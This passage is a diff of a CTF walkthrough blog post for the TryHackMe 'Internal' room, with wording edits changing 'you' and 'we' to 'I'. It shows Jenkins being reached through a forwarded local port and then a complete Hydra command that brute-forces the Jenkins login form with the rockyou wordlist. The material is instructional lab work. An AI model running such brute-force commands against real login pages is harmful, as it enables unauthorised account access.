thefawsec/thefawsec.github.io/_posts/CTF-Walkthroughs/Tryhackme-Rooms/2021-04-11-THM-Internal.md

 ![](/assets/img/posts/thm-internal/Screenshot_20210410_194257.png)

-Now you'll be able to access the jenkin from your local machine at the address **`127.0.0.1:9999`:**
+Now we'll be able to access the jenkin from our local machine at the address **`127.0.0.1:9999`:**

 ![](/assets/img/posts/thm-internal/Screenshot_20210410_194426.png)

 I tried the credentials that we found so far but both did not worked.
 So lets brutforce the login.
-We'll be using Hydra here:
+I'll be using Hydra here:

 ```bash
 hydra -l admin -P /wordlists/rockyou.txt 127.0.0.1 -s 9999  http-post-form '/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid+username+or+password'